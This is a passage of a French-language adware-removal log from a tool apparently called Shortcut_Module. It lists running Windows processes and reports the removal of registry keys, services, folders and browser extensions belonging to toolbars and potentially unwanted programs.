¤¤¤¤¤¤¤¤¤¤ | Shortcut_Module | g3n-h@ckm@n | 22.02.2014.6 ¤¤¤¤¤ XP | Vista | 7 | 8 - 32/64 bits ¤¤¤¤¤ - Start 10:36:22 - 23/02/2014 Mis à jour le : 22/02/2014 | 20.50 par g3n-h@ckm@n Contact : http://www.sosvirus.net Boot : Normal Système : Windows 7 Home Premium (64 bits) HomePremium Service Pack 1 Mémoire RAM = Total (MB) : 3911 | Libre (MB) : 2597 Pagefile = Total (MB) : 7819 | Libre (MB) : 6144 Virtuelle = Total (MB) : 4194 | Libre (MB) : 4051 Registre sauvegardé , pour restaurer : C:\Shortcut_Module\Save\Clean\ERDNT.exe ¤¤¤¤¤¤¤¤¤¤ | Mises à jour Windows Aucune mise à jour détectée !!! 872 | C:\Windows\system32\atiesrxx.exe (.AMD - AMD External Events Service Module.) - (6.14.11.1096) -> C:\Windows\system32\atiesrxx.exe 1108 | C:\Windows\system32\atieclxx.exe (.AMD - AMD External Events Client Module.) - (6.14.11.1096) -> atieclxx 1268 | C:\Windows\system32\WLANExt.exe (.Microsoft Corporation - Infrastructure d’extensibilité pour les services réseau Windows sans fil 802.11.) - (6.1.7600.16385) -> C:\Windows\system32\WLANExt.exe 28932048 1276 | C:\Windows\system32\conhost.exe (.Microsoft Corporation - Hôte de la fenêtre de la console.) - (6.1.7601.18229) -> \??\C:\Windows\system32\conhost.exe "1929155468-567233253166316579-6340675381894124430127540307-1772150189-1753591939 1568 | C:\Windows\Explorer.EXE (.Microsoft Corporation - Explorateur Windows.) - (6.1.7601.17567) -> C:\Windows\Explorer.EXE 1596 | C:\Windows\System32\spoolsv.exe (.Microsoft Corporation - Application sous-système spouleur.) - (6.1.7601.17777) -> C:\Windows\System32\spoolsv.exe 1644 | C:\Windows\system32\taskhost.exe (.Microsoft Corporation - Processus hôte pour Tâches Windows.) - (6.1.7601.18010) -> "taskhost.exe" 1840 | C:\Windows\system32\rundll32.exe (.Microsoft Corporation - Processus hôte Windows (Rundll32).) - (6.1.7600.16385) -> "C:\Windows\system32\rundll32.exe" "c:\progra~2\optimi~1\OptProCrashSvc.dll",ServiceMain 1852 | C:\Windows\SysWOW64\rundll32.exe (.Microsoft Corporation - Processus hôte Windows (Rundll32).) - (6.1.7600.16385) -> "C:\Windows\system32\rundll32.exe" "c:\progra~2\optimi~1\OptProCrashSvc.dll",ServiceMain 1900 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (.Adobe Systems Incorporated - Adobe Acrobat Update Service.) - (1.701.3.3014) -> "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" 1992 | C:\Windows\system32\taskeng.exe (.Microsoft Corporation - Moteur du Planificateur de tâches.) - (6.1.7601.17514) -> taskeng.exe {0FA77671-36A7-4325-B8AB-50F1F0EBAB4C} 1048 | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (.Google Inc. - Programme d'installation de Google.) - (1.3.21.103) -> "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /c 1404 | C:\Program Files\Acer\Acer ePower Management\ePowerTray.exe (.Acer Incorporated - ePowerTray.) - (6.0.3008.0) -> "C:\Program Files\Acer\Acer ePower Management\ePowerTray.exe" 1400 | C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE (.CANON INC. - Canon My Printer.) - (2.9.0.0) -> "C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE" /logon 1388 | C:\Program Files (x86)\RocketDock\RocketDock.exe (. - .) - (0.0.0.0) -> "C:\Program Files (x86)\RocketDock\RocketDock.exe" 108 | C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe (.Acer Incorporated - Acer VCM.) - (4.5.3501.0) -> "C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe" 1720 | C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (.Broadcom Corporation. - Bluetooth Tray Application.) - (6.2.1.100) -> "C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe" 1920 | C:\Program Files\Rainmeter\Rainmeter.exe (. - Rainmeter.) - (2.2.0.1116) -> "C:\Program Files\Rainmeter\Rainmeter.exe" 2084 | C:\Program Files (x86)\Launch Manager\LManager.exe (.Dritek System Inc. - Launch Manager.) - (5.1.7.2308) -> "C:\Program Files (x86)\Launch Manager\LManager.exe" 2128 | C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe (.Dritek System Inc. - MMDx64Fx Application.) - (2.0.0.2308) -> "C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe" 2144 | C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE (.CANON INC. - Canon Solution Menu EX.) - (1.3.5.0) -> "C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE" /logon 2164 | C:\Program Files (x86)\Real\RealPlayer\Update\realsched.exe (.RealNetworks, Inc. - RealNetworks Scheduler.) - (16.0.3.51) -> "C:\Program Files (x86)\Real\RealPlayer\Update\realsched.exe" -osboot 2224 | C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (.Oracle Corporation - Java(TM) Update Scheduler.) - (2.1.9.8) -> "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" 2832 | C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe (.Broadcom Corporation. - Bluetooth Support Server.) - (6.2.1.100) -> "C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe" 2912 | C:\Windows\system32\CxAudMsg64.exe (.Conexant Systems Inc. - Conexant Audio Message Service.) - (1.2.0.0) -> C:\Windows\system32\CxAudMsg64.exe 2952 | C:\Program Files (x86)\Launch Manager\dsiwmis.exe (.Dritek System Inc. - Dritek WMI Service.) - (3.6.0.2308) -> "C:\Program Files (x86)\Launch Manager\dsiwmis.exe" 2992 | C:\Program Files (x86)\Launch Manager\LMworker.exe (.Dritek System Inc. - Launch Manager Worker.) - (2.5.1.2308) -> "C:\Program Files (x86)\Launch Manager\LMworker.exe" 3000 | C:\Program Files\Acer\Acer ePower Management\ePowerSvc.exe (.Acer Incorporated - ePowerSvc.) - (6.0.3008.0) -> "C:\Program Files\Acer\Acer ePower Management\ePowerSvc.exe" 2068 | C:\Program Files (x86)\Launch Manager\LMutilps32.exe (.Dritek System Inc. - Launch Manager utility process.) - (1.4.0.2308) -> "C:\Program Files (x86)\Launch Manager\LMutilps32.exe" --system-level-mutex="Local\{B904A927-FE6B-48fd-8C83-6B807BED1F9C}" --enable-wmi-window 408 | C:\Program Files (x86)\Acer\Registration\GREGsvc.exe (.Acer Incorporated - Global Registration Service.) - (1.0.0.3) -> "C:\Program Files (x86)\Acer\Registration\GREGsvc.exe" 1372 | C:\ProgramData\DatacardService\HWDeviceService64.exe (. - DCSHOST.) - (2.0.0.47) -> "C:\ProgramData\DatacardService\HWDeviceService64.exe" -/service 2352 | C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE (. - Inkjet Printer/Scanner/Fax Extended Survey Program Service.) - (3.4.0.0) -> "C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE" 2444 | C:\ProgramData\DatacardService\DCSHelper.exe (.Huawei Technologies Co., Ltd. - DataCardMonitor MFC Application.) - (2.0.0.47) -> "C:\ProgramData\DatacardService\DCSHelper.exe" 1776 | C:\Program Files\Acer\Acer Updater\UpdaterService.exe (.Acer Incorporated - Updater Service.) - (1.2.3502.0) -> "C:\Program Files\Acer\Acer Updater\UpdaterService.exe" 2008 | C:\ProgramData\MobileBrServ\mbbservice.exe (. - .) - (22.14.0.3) -> "C:\ProgramData\MobileBrServ\mbbservice.exe" -service 1736 | C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe (. - PassThruSvr Application.) - (1.2.1.6) -> "C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe" 2980 | C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe (. - .) - (0.0.0.0) -> "C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe" 2552 | C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe (.Acer Incorporated - Raw Socket Service.) - (4.5.3000.9285) -> "C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe" 3436 | C:\Windows\system32\SearchIndexer.exe (.Microsoft Corporation - Indexeur Microsoft Windows Search.) - (7.0.7601.17610) -> C:\Windows\system32\SearchIndexer.exe /Embedding 3912 | C:\Windows\splwow64.exe (.Microsoft Corporation - Print driver host for 32bit applications.) - (6.1.7601.17777) -> C:\Windows\splwow64.exe 8192 4168 | C:\Windows\system32\wbem\unsecapp.exe (.Microsoft Corporation - Sink to receive asynchronous callbacks for WMI client application.) - (6.1.7600.16385) -> C:\Windows\system32\wbem\unsecapp.exe -Embedding 4468 | C:\Program Files\Acer\Acer ePower Management\ePowerEvent.exe (.Acer Incorporated - ePowerEvent.) - (6.0.3008.0) -> "C:\Program Files\Acer\Acer ePower Management\ePowerEvent.exe" 4128 | C:\Program Files\Windows Media Player\wmpnetwk.exe (.Microsoft Corporation - Service Partage réseau du Lecteur Windows Media.) - (12.0.7601.17514) -> "C:\Program Files\Windows Media Player\wmpnetwk.exe" 1032 | C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe (.Advanced Micro Devices Inc. - Catalyst Control Center: Monitoring program.) - (2.0.0.0) -> "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM" 3524 | C:\Program Files\Common Files\Microsoft Shared\Ink\InputPersonalization.exe (.Microsoft Corporation - Serveur de personnalisation d’entrée.) - (6.1.7600.16385) -> "C:\Program Files\Common Files\Microsoft Shared\Ink\InputPersonalization.exe" 5036 | C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe (.ATI Technologies Inc. - Catalyst Control Center: Host application.) - (3.5.0.0) -> "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe" 0 4860 | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe (.Microsoft Corporation - PresentationFontCache.exe.) - (3.0.6920.5011) -> C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe 6100 | C:\Windows\system32\taskhost.exe (.Microsoft Corporation - Processus hôte pour Tâches Windows.) - (6.1.7601.18010) -> "taskhost.exe" ¤¤¤¤¤¤¤¤¤¤ | Services Service en fonctionnement : WINDEFEND Service stoppé : WINDEFEND Supprimé avec succès : HKLM\..\ControlSet001\Services\BackupStack : C:\Program Files (x86)\MyPC Backup\BackupStack.exe Supprimé avec succès : HKLM\..\ControlSet001\Services\Re-markit : C:\Program Files (x86)\Re-markit\Re-markit153.exe Supprimé avec succès : HKLM\..\ControlSet002\Services\BackupStack : C:\Program Files (x86)\MyPC Backup\BackupStack.exe Supprimé avec succès : HKLM\..\ControlSet002\Services\Re-markit : C:\Program Files (x86)\Re-markit\Re-markit153.exe ¤¤¤¤¤¤¤¤¤¤ | Hosts C:\Windows\System32\Drivers\etc\hosts : Remis a zéro avec succès ¤¤¤¤¤¤¤¤¤¤ | Registre Supprimé avec succès : HKLM\Software\Classes\System.Runtime.Remoting.Metadata.W3cXsd2001.SoapNotation Supprimé avec succès : HKLM\Software\Classes\System.Runtime.Remoting.Metadata.W3cXsd2001.SoapNotation Supprimé avec succès : [64]HKLM\Software\Classes\System.Runtime.Remoting.Metadata.W3cXsd2001.SoapNotation Supprimé avec succès : [64]HKLM\Software\Classes\System.Runtime.Remoting.Metadata.W3cXsd2001.SoapNotation Supprimé avec succès : HKLM\Software\Classes\CLSID\{112BA211-334C-4A90-90EC-2AD1CDAB287C} : C:\Program Files (x86)\IminentToolbar\1.8.28.3\bh\iminent.dll Supprimé avec succès : HKLM\Software\Classes\CLSID\{1FAFD711-ABF9-4F6A-8130-5166C7371427} : C:\Program Files (x86)\IminentToolbar\1.8.28.3\iminentTlbr.dll Supprimé avec succès : HKLM\Software\Classes\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C} : C:\Program Files (x86)\SupTab\SupTab.dll Supprimé avec succès : HKLM\Software\Classes\CLSID\{99E71BF1-5F51-4AF9-830B-67015D59640D} : "C:\Program Files (x86)\IminentToolbar\1.8.28.3\iminentsrv.exe" Supprimé avec succès : HKLM\Software\Classes\CLSID\{9FD0C1D9-180B-4834-B80B-4B7325AF90E1} : C:\Program Files (x86)\IminentToolbar\1.8.28.3\iminentEng.dll Supprimé avec succès : HKLM\Software\Classes\CLSID\{A2CC3C46-143B-4142-9D5A-B8543F0A6F55} : C:\Program Files (x86)\IminentToolbar\1.8.28.3\iminentApp.dll Supprimé avec succès : HKLM\Software\Classes\CLSID\{D40753C7-8A59-4C1F-BE88-C300F4624D5B} : "C:\Program Files (x86)\Mysearchdial\1.8.21.0\mysearchdialsrv.exe" Supprimé avec succès : HKLM\Software\Classes\AppID\{0E4B2CAB-B859-4C57-B96E-63DDEC692BC4} : C:\Program Files (x86)\IminentToolbar\1.8.28.3\sqlite3.dll Supprimé avec succès : HKLM\Software\Classes\AppID\{CA5CAA63-B27C-4963-9BEC-CB16A36D56F8} : http://start.mysearchdial.com/?f=1&a=tele0103&cd=2XzuyEtN2Y1L1Qzu0CtDtCzzzzyDzz0ByB0D0CyDtA0C0A0DtN0D0Tzu0CyByDyCtN1L2XzutBtFtBtFtCyDtFtCyCtAtCtN1L1CzutBtAtDtC1N1R&cr=1162226140&ir= Supprimé avec succès : [64:32]HKLM\Software\Classes\TypeLib\{5563BEFE-3B03-43B1-8041-64A9745DAA56} : C:\Program Files (x86)\IminentToolbar\1.8.28.3\iminentEng.dll\2 Supprimé avec succès : [64:32]HKLM\Software\Classes\TypeLib\{8E9F2D02-6B06-4EBA-92C2-68438EADED28} : C:\Program Files (x86)\IminentToolbar\1.8.28.3\iminentsrv.exe Supprimé avec succès : [64:32]HKLM\Software\Classes\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D} : C:\Program Files (x86)\SupTab\SupTab.dll Supprimé avec succès : [64:32]HKLM\Software\Classes\TypeLib\{C292AD0A-C11F-479B-B8DB-743E72D283B0} : C:\Program Files (x86)\Mysearchdial\1.8.21.0\mysearchdialsrv.exe Supprimé avec succès : HKLM\Software\Classes\Interface\{050000CE-F9D5-4145-9490-DB9E7E40FDF9} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : [64]HKLM\Software\Classes\Interface\{050000CE-F9D5-4145-9490-DB9E7E40FDF9} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : HKLM\Software\Classes\Interface\{476DAA21-E0C3-4EEB-B27B-5F4123334ABA} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : [64]HKLM\Software\Classes\Interface\{476DAA21-E0C3-4EEB-B27B-5F4123334ABA} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : HKLM\Software\Classes\Interface\{7DE6769A-E482-4AB7-8ED9-0CAFEA11D687} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : [64]HKLM\Software\Classes\Interface\{7DE6769A-E482-4AB7-8ED9-0CAFEA11D687} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : HKLM\Software\Classes\Interface\{813F8915-C940-44ED-ADED-8B782D85FA87} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : [64]HKLM\Software\Classes\Interface\{813F8915-C940-44ED-ADED-8B782D85FA87} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : HKLM\Software\Classes\Interface\{8D182E50-D646-49FF-B518-34B09BDF5375} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : [64]HKLM\Software\Classes\Interface\{8D182E50-D646-49FF-B518-34B09BDF5375} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : HKLM\Software\Classes\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8} : {968EDCE0-C10A-47BB-B3B6-FDF09F2A417D} Supprimé avec succès : [64]HKLM\Software\Classes\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8} : {968EDCE0-C10A-47BB-B3B6-FDF09F2A417D} Supprimé avec succès : HKLM\Software\Classes\Interface\{9563917C-2D1F-4E92-A90F-01E470099B68} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : [64]HKLM\Software\Classes\Interface\{9563917C-2D1F-4E92-A90F-01E470099B68} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : HKLM\Software\Classes\Interface\{A182C848-76B5-4473-B742-A688D38982A1} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : [64]HKLM\Software\Classes\Interface\{A182C848-76B5-4473-B742-A688D38982A1} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : HKLM\Software\Classes\Interface\{AC5C40D0-DC3A-4406-A35C-9102C5FA4D7E} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : [64]HKLM\Software\Classes\Interface\{AC5C40D0-DC3A-4406-A35C-9102C5FA4D7E} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : HKLM\Software\Classes\Interface\{C336533A-5E74-457F-AD87-9598F4AADF49} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : [64]HKLM\Software\Classes\Interface\{C336533A-5E74-457F-AD87-9598F4AADF49} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : HKLM\Software\Classes\Interface\{C8C14216-4D34-4866-B66E-BC25B98FCCCA} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : [64]HKLM\Software\Classes\Interface\{C8C14216-4D34-4866-B66E-BC25B98FCCCA} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : HKLM\Software\Classes\Interface\{E54B3747-7507-43B0-8537-A64189F28B35} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : [64]HKLM\Software\Classes\Interface\{E54B3747-7507-43B0-8537-A64189F28B35} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : HKLM\Software\Classes\Interface\{F761BABE-0622-4DCE-A1B0-9D1BCA75DFEF} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : [64]HKLM\Software\Classes\Interface\{F761BABE-0622-4DCE-A1B0-9D1BCA75DFEF} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : HKLM\Software\Classes\Interface\{F98F0DE1-9B6F-4C87-8E08-6EE5928D8558} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : [64]HKLM\Software\Classes\Interface\{F98F0DE1-9B6F-4C87-8E08-6EE5928D8558} : {5563BEFE-3B03-43B1-8041-64A9745DAA56} Supprimé avec succès : HKLM\Software\Microsoft\Tracing\SoftwareUpdate_RASAPI32 Supprimé avec succès : HKLM\Software\Microsoft\Tracing\YontooSetup-S-1028_RASAPI32 Supprimé avec succès : HKLM\Software\Microsoft\Tracing\SoftwareUpdate_RASMANCS Supprimé avec succès : HKLM\Software\Microsoft\Tracing\YontooSetup-S-1028_RASMANCS Supprimé avec succès : [HKLM\Software\mozilla\Firefox\Extensions]|[lightningnewtab@gmail.com] : : C:\Users\Audrey\AppData\Roaming\Mozilla\Firefox\Profiles\n7eymfj7.default\extensions\lightningnewtab@gmail.com.xpi Supprimé avec succès : HKLM\Software\Google\Chrome\Extensions\pkndmigholgfjlniaohblojbhgjbkakn : : C:\Users\Audrey\AppData\Local\Google\Chrome\User Data\Default\Extensions\newtabv2.crx Supprimé avec succès : HKLM\SOFTWARE\awesomehpSoftware Supprimé avec succès : HKLM\SOFTWARE\IminentToolbar Supprimé avec succès : HKLM\SOFTWARE\supTab Supprimé avec succès : HKLM\SOFTWARE\SweetIM Supprimé avec succès : HKLM\SOFTWARE\Wpm Supprimé avec succès : HKLM\SOFTWARE\supWPM Supprimé avec succès : HKU\S-1-5-21-407670505-2902744457-41463410-1001\Software\IminentToolbar Supprimé avec succès : HKU\S-1-5-21-407670505-2902744457-41463410-1001\Software\Optimizer Pro Supprimé avec succès : HKLM\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{208D4124-3895-4974-B293-A159BD306078} : C:\Program Files (x86)\IminentToolbar\1.8.28.3 Supprimé avec succès : HKU\S-1-5-21-407670505-2902744457-41463410-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{112BA211-334C-4A90-90EC-2AD1CDAB287C} Supprimé avec succès : HKU\S-1-5-21-407670505-2902744457-41463410-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{1FAFD711-ABF9-4F6A-8130-5166C7371427} Supprimé avec succès : HKU\S-1-5-21-407670505-2902744457-41463410-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C} Supprimé avec succès : HKU\S-1-5-21-407670505-2902744457-41463410-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{112BA211-334C-4A90-90EC-2AD1CDAB287C} Supprimé avec succès : HKU\S-1-5-21-407670505-2902744457-41463410-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{1FAFD711-ABF9-4F6A-8130-5166C7371427} Supprimé avec succès : HKU\S-1-5-21-407670505-2902744457-41463410-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C} Supprimé avec succès : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{30C49DD5-E7D1-FA9D-C86E-140763C3E36B} : Mysearchdial Supprimé avec succès : [64]HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{460C3D19-B3D4-4964-A550-77D263B0CCCB} : http://www.awesomehp.com/web/?type=ds&ts=1392487221&from=amt&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXE1EB1NPNU2NPNU2&q={searchTerms} Supprimé avec succès : HKU\S-1-5-21-407670505-2902744457-41463410-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{460C3D19-B3D4-4964-A550-77D263B0CCCB} : awesomehp Supprimé avec succès : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{112BA211-334C-4A90-90EC-2AD1CDAB287C} Supprimé avec succès : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C} Supprimé avec succès : HKLM\Software\Classes\Installer\Products\0D5EEEC4509F88649B9FCE7C01057769 : C:\Users\Audrey\AppData\Local\Temp\{83D2D371-DAB4-4370-A41C-AC2D97049C78}\ Supprimé avec succès : HKLM\Software\Classes\Installer\Products\11F45BA4C8F23E110BF98BCAF6798BE8 : C:\Windows\Temp\._msigeplugin61\ Supprimé avec succès : HKLM\Software\Classes\Installer\Products\1C955A13D4E9B324D93D436A5C937825 : C:\Users\Audrey\AppData\Local\Temp\{64D83255-C180-4EC8-ADB6-DBA0E1435115}\{708C531A-58C1-4238-A77F-797832719AC1}\ Supprimé avec succès : HKLM\Software\Classes\Installer\Products\1F764691F11C67F458B88521DA8CB349 : C:\Users\Audrey\AppData\Local\Temp\{64D83255-C180-4EC8-ADB6-DBA0E1435115}\{12C57857-9BD6-4DC9-B1B3-0945E522FE84}\ Supprimé avec succès : HKLM\Software\Classes\Installer\Products\3E2D8E8CA6FED1B40AE9B772BE2E3FEC : C:\Users\Audrey\AppData\Local\Temp\~rnsetup\DOWNLOADER\ Supprimé avec succès : HKLM\Software\Classes\Installer\Products\53C477C4FA0E1E2731A6B26F66072286 : C:\Users\Administrator\AppData\Local\Temp\fla9E1.tmp\ Supprimé avec succès : HKLM\Software\Classes\Installer\Products\9A4666D624338494B9E730E4EF63F6F0 : C:\Users\Audrey\AppData\Local\Temp\{9CE31C77-B63C-41E5-819A-7D2BB5411E1D}\ Supprimé avec succès : HKLM\Software\Classes\Installer\Products\A3454E95D94D98444B5474D367C397FA : C:\Users\Audrey\AppData\Local\Temp\Rar$EXa0.173\GTAIV\Redistributable\ Supprimé avec succès : HKLM\Software\Classes\Installer\Products\AB7FCEAAB38E01A478AEEDB033F37843 : C:\Users\Audrey\AppData\Local\Temp\~rnsetup\ Supprimé avec succès : HKLM\Software\Classes\Installer\Products\B17E077734D20084C93BB5C6AABEBEAE : C:\Users\Audrey\AppData\Local\Temp\~rnsetup\ Supprimé avec succès : HKLM\Software\Classes\Installer\Products\b25099274a207264182f8181add555d0 : C:\Users\Audrey\AppData\Local\Temp\IXP001.TMP\ Supprimé avec succès : HKLM\Software\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a : C:\Windows\TEMP\IXP000.TMP\ Supprimé avec succès : HKLM\Software\Classes\Installer\Products\C28643E881181F13CBC489DC69571E2C : C:\Users\Audrey\AppData\Local\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\ Supprimé avec succès : HKLM\Software\Classes\Installer\Products\C3E2830A4837A924B9AFFA85885E1A39 : C:\Users\Audrey\AppData\Local\Temp\pft60A1.tmp\ Supprimé avec succès : HKLM\Software\Classes\Installer\Products\C6C2C29BE07FB794887AF1FE898872B2 : c:\users\audrey\appdata\local\temp\airf076.tmp\ Supprimé avec succès : HKLM\Software\Classes\Installer\Products\3e43b73803c7c394f8a6b2f0402e19c2 : C:\Users\Audrey\AppData\Local\Temp\IXP000.TMP\ Supprimé avec succès : [64]HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\28BCAF3899EBB1044B3315242BC8149E] : C:\Users\Audrey\AppData\Local\Temp\ Supprimé avec succès : [64]HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\649A52D257CA5DB4EAAE8BA9EB23E467] : 01:\Software\Smartbar\version Supprimé avec succès : HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\050da802-31eb-4d5d-9b8e-4400e0c0f928 : C:\Program Files (x86)\Re-markit\Uninstall.exe Supprimé avec succès : HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\IePlugins : C:\ProgramData\IePluginService\PluginService.exe -uninstall Supprimé avec succès : HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Optimizer Pro_is1 : "C:\Program Files (x86)\Optimizer Pro\unins000.exe" Supprimé avec succès : HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\SupTab : C:\Program Files (x86)\SupTab\uninstall.exe Supprimé avec succès : HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\WPM : C:\ProgramData\WPM\wprotectmanager.exe -uninstall Supprimé avec succès : [64]HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\MyPC Backup : C:\Program Files (x86)\MyPC Backup\uninst.exe Supprimé avec succès : [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]|[mobilegeni daemon] : C:\Program Files (x86)\Mobogenie\DaemonProcess.exe ¤¤¤¤¤¤¤¤¤¤ | IFEO ¤¤¤¤¤¤¤¤¤¤ | Dossiers Supprimé avec succès : C:\Windows\Tasks\Re-markit_wd.job Supprimé avec succès : C:\ProgramData\InstallMate Supprimé avec succès : C:\ProgramData\IePluginService Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Awesomehp Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\newnext.me Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Optimizer Pro Supprimé avec succès : C:\Users\Audrey\Documents\Mobogenie Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MyPC Backup Supprimé avec succès : C:\Program Files (x86)\MyPC Backup Supprimé avec succès : C:\Program Files (x86)\Optimizer Pro Supprimé avec succès : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Optimizer Pro v3.2 Supprimé avec succès : C:\Users\Audrey\AppData\Local\genienext Supprimé avec succès : C:\Users\Audrey\AppData\Local\Mobogenie Supprimé avec succès : C:\Users\Audrey\AppData\Local\mysearchdial-speeddial.crx Supprimé avec succès : C:\Users\All Users\WildTangent\fate\Cache\PROPS\TORCHSTAND.DDS Supprimé avec succès : C:\Users\Audrey\AppData\Local\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\UNGSWRNV\zynga2-a.akamaihd.net Supprimé avec succès : C:\Users\Audrey\AppData\Local\Temp\ca0f0a40-4c91-4720-bf22-cf813fed20fa\bin\Fortunitas Supprimé avec succès : C:\Users\Audrey\AppData\Local\Temp\ca0f0a40-4c91-4720-bf22-cf813fed20fa\bin\Snapdo Supprimé avec succès : C:\Users\Audrey\AppData\Local\Temp\ca0f0a40-4c91-4720-bf22-cf813fed20fa\bin\Vuupc Supprimé avec succès : C:\Users\Audrey\AppData\Local\Temp\ca0f0a40-4c91-4720-bf22-cf813fed20fa\software\OptimizerPro.exe Supprimé avec succès : C:\Users\Audrey\AppData\Local\Temp\ca0f0a40-4c91-4720-bf22-cf813fed20fa\temp\Fortunitasinfo.dfe Supprimé avec succès : C:\Users\Audrey\AppData\Local\Temp\ca0f0a40-4c91-4720-bf22-cf813fed20fa\temp\Snapdoinfo.dfe Supprimé avec succès : C:\Users\Audrey\AppData\Local\Temp\ca0f0a40-4c91-4720-bf22-cf813fed20fa\temp\Vuupcinfo.dfe Supprimé avec succès : C:\Users\Audrey\AppData\Roaming\Foxit Software\Foxit Reader\StartPage\start\de_de\toolbar.mode.txt Supprimé avec succès : 